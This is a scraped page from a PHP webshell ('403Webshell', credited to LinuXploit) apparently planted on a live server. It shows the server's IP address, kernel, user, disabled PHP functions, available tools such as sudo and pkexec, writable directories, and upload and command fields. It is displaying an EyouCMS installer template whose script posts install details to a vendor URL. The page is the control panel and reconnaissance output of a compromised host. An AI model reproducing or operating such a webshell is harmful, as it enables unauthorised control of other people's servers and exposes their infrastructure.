403Webshell
Server IP : 156.238.232.47  /  Your IP : 216.73.216.150
Web Server : nginx/1.25.3
System : Linux C202504152095410 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : www ( 1000)
PHP Version : 8.3.25
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/data/wwwroot/26022724.961104.xyz/install_9nALuBtLdTcpE6nu4D6o/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/data/wwwroot/26022724.961104.xyz/install_9nALuBtLdTcpE6nu4D6o/templates/step5.php
<!doctype html>
<html>
<head>
  <meta charset="UTF-8" />
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" >
  <meta http-equiv="Content-Language" content="zh-cn"/>
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
  <title><?php echo $Title; ?> - <?php echo $Powered; ?></title>
  <link rel="stylesheet" href="./css/install.css?v=v1.6.4" />
  <script src="./js/jquery.js?v=v1.6.4"></script> 
  <?php 
    $uri = $_SERVER['REQUEST_URI'];
    $root = substr($uri, 0,strpos($uri, "install"));
    $admin = $root."../login.php";
  ?>
</head>
<body>
  <div class="wrap">
    <?php require './templates/header.php';?>
    <section class="section">
      <div class="blank10"></div>
      <div class="blank30"></div>
      <div class="go go4"></div>
      <div class="blank10"></div>
      <div class="blank30"></div>
      <div class="">
        <div class="result cc"> 
          <h1>恭喜您,EyouCms已经成功安装完成!</h1>
          <h5>基于安全考虑,安装完成后正式运营时请将后台密码设置复杂一些!</h5>
        </div>
  	        <div class="bottom tac"> 
            <center>
  	        <a href="../index.php" class="btn_b" style="color: #fff"> 访问网站首页 </a>
  	        <a id="next_submit" href="../login.php" class="btn_a btn_submit J_install_btn"> 登陆网站后台 </a>	
            </center>
        </div>
        <div class=""> </div>
      </div>
    </section>
  </div>
  <div class="blank30"></div>
  <?php require './templates/footer.php';?>
  
  <script>
  $(function(){
      <?php if (!empty($service_ey)) { ?>
          $.ajax({
              type: "POST",
              url: "<?php echo $service_ey.base64_decode($ajax_url);?>",
              data: {domain:'<?php echo $host;?>',last_domain:'<?php echo $host;?>',key_num:'<?php echo $cms_version;?>',install_time:'<?php echo $time;?>',serial_number:'<?php echo $mt_rand_str;?>',ip:'<?php echo $ip;?>',phpv:'<?php echo $phpv;?>',web_server:'<?php echo $web_server;?>'},
              dataType: 'jsonp',
              jsonp: "jsonpCallback",//服务端用于接收callback调用的function名的参数 
              success: function(){}
          });
      <?php } ?>
      $('#next_submit').focus();
  });
  </script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit